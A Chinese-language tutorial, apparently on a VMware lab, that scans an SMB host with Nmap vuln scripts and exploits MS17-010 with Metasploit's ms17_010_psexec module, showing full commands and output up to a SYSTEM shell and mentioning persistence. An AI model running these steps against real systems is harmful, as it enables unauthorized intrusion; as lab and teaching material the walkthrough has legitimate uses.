利用Metasploit+Nmap进行渗透网络服务器，直接获取管理权限

Metasploit这个强大的渗透工具，在这里我就不做过多介绍了，还有Nmap也是一个强大端口扫描工具，在黑客界里无人不知无人不晓，本次主要讲解，这两款工具结合使用，废话不扯，直接进入正题。

第一步：利用Nmap扫描

msf5 > db_nmap --script=vuln 192.168.41.143
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-24 01:25 CST
[*] Nmap: Nmap scan report for 192.168.41.143
[*] Nmap: Host is up (0.00055s latency).
[*] Nmap: All 1000 scanned ports on 192.168.41.143 are filtered
[*] Nmap: MAC Address: 00:0C:29:42:D2:0A (VMware)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 36.95 seconds
msf5 > db_nmap --script=vuln 192.168.41.143
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-24 01:28 CST
[*] Nmap: Nmap scan report for 192.168.41.143
[*] Nmap: Host is up (0.00076s latency).
[*] Nmap: All 1000 scanned ports on 192.168.41.143 are filtered
[*] Nmap: MAC Address: 00:0C:29:42:D2:0A (VMware)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 38.98 seconds
msf5 > db_nmap --script=vuln 192.168.41.142
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-24 01:30 CST
[*] Nmap: Nmap scan report for 192.168.41.142
[*] Nmap: Host is up (0.00044s latency).
[*] Nmap: Not shown: 997 closed ports
[*] Nmap: PORT    STATE SERVICE
[*] Nmap: 135/tcp open  msrpc
[*] Nmap: 139/tcp open  netbios-ssn
[*] Nmap: 445/tcp open  microsoft-ds
[*] Nmap: MAC Address: 00:0C:29:5D:58:E1 (VMware)
[*] Nmap: Host script results:
[*] Nmap: |_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
[*] Nmap: |_smb-vuln-ms10-054: false
[*] Nmap: |_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
[*] Nmap: | smb-vuln-ms17-010:
[*] Nmap: |   VULNERABLE:
[*] Nmap: |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
[*] Nmap: |     State: VULNERABLE
[*] Nmap: |     IDs:  CVE:CVE-2017-0143
[*] Nmap: |     Risk factor: HIGH
[*] Nmap: |       A critical remote code execution vulnerability exists in Microsoft SMBv1
[*] Nmap: |        servers (ms17-010).
[*] Nmap: |
[*] Nmap: |     Disclosure date: 2017-03-14
[*] Nmap: |     References:
[*] Nmap: |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
[*] Nmap: |       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
[*] Nmap: |_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 21.53 seconds

看到扫描结果，我们可以看出来，有几个可以了利用漏洞，开发445端口是存在smb的，我们随便利用一个漏洞来进行渗透攻击。

第二步：利用Metasploit查询对应的漏洞模块

首先我们输入命令：search ms17-010 查询有没有对应的漏洞模块，

msf5 > search ms17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

显示结果是有对应漏洞模块的，ms17 指的是2017年出现的漏洞，有对应漏洞那就好办了，下面三个我们随便选一个出来，我这里选最后一个来进一步渗透攻击。

第三步：选择对应攻击模块

由于不能截完整图，我附代码

msf5 > use exploit/windows/smb/ms17_010_psexec
msf5 exploit(windows/smb/ms17_010_psexec) > set payload windows/shell_bind_tcp
payload => windows/shell_bind_tcp
msf5 exploit(windows/smb/ms17_010_psexec) > show options

Module options (exploit/windows/smb/ms17_010_psexec):

   Name                  Current Setting                                                 Required  Description
   ----                  ---------------                                                 --------  -----------
   DBGTRACE              false                                                           yes       Show extra debug trace info
   LEAKATTEMPTS          99                                                              yes       How many times to try to leak transaction
   NAMEDPIPE                                                                             no        A named pipe that can be connected to (leave blank for auto)
   NAMED_PIPES           /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                                yes       The target address range or CIDR identifier
   RPORT                 445                                                             yes       The Target port
   SERVICE_DESCRIPTION                                                                   no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                                                  no        The service display name
   SERVICE_NAME                                                                          no        The service name
   SHARE                 ADMIN$                                                          yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                               no        The password for the specified username
   SMBUser                                                                               no        The username to authenticate as


Payload options (windows/shell_bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST                      no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic

不清楚仔细看图，首先我们要命令：

showoptions

查看需要做哪些配置，当然攻击目标服务器ip设置上去，配置好之后万事俱备

msf5 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 192.168.41.142
RHOSTS => 192.168.41.142
msf5 exploit(windows/smb/ms17_010_psexec) >

到这里已经全部配置好，接下来有点激动，迫不及待发出进攻号令发动进攻，进攻号令：exploit

msf5 exploit(windows/smb/ms17_010_psexec) > exploit

[*] 192.168.41.142:445 - Target OS: Windows 5.1
[*] 192.168.41.142:445 - Filling barrel with fish... done
[*] 192.168.41.142:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 192.168.41.142:445 -   [*] Preparing dynamite...
[*] 192.168.41.142:445 -     [*] Trying stick 1 (x86)...Boom!
[*] 192.168.41.142:445 -   [+] Successfully Leaked Transaction!
[*] 192.168.41.142:445 -   [+] Successfully caught Fish-in-a-barrel
[*] 192.168.41.142:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 192.168.41.142:445 - Reading from CONNECTION struct at: 0x821e58b0
[*] 192.168.41.142:445 - Built a write-what-where primitive...
[+] 192.168.41.142:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.41.142:445 - Selecting native target
[*] 192.168.41.142:445 - Uploading payload... uIppviFQ.exe
[*] 192.168.41.142:445 - Created \uIppviFQ.exe...
[+] 192.168.41.142:445 - Service started successfully...
[*] 192.168.41.142:445 - Deleting \uIppviFQ.exe...
[*] Started bind TCP handler against 192.168.41.142:4444
[*] Command shell session 1 opened (192.168.41.128:33767 -> 192.168.41.142:4444) at 2019-08-24 01:41:00 +0800

看到现在已经对445端口进军了

在后面我们可以看出来，成功入侵并且反弹一个shell，

现在成功拿下这台服务器系统权限，看网络连接情况，已经成功链接，拿到cmd权限可以这这台服务器实施控制，比如我们创建系统账号提权，对这台服务器做持久控制，好了今天就到这里，谢谢大家。

上一文章：路由器的密码忘记了怎么办，如何修改wifi密码

下一文章：csrf攻击原理及攻击流程实例演示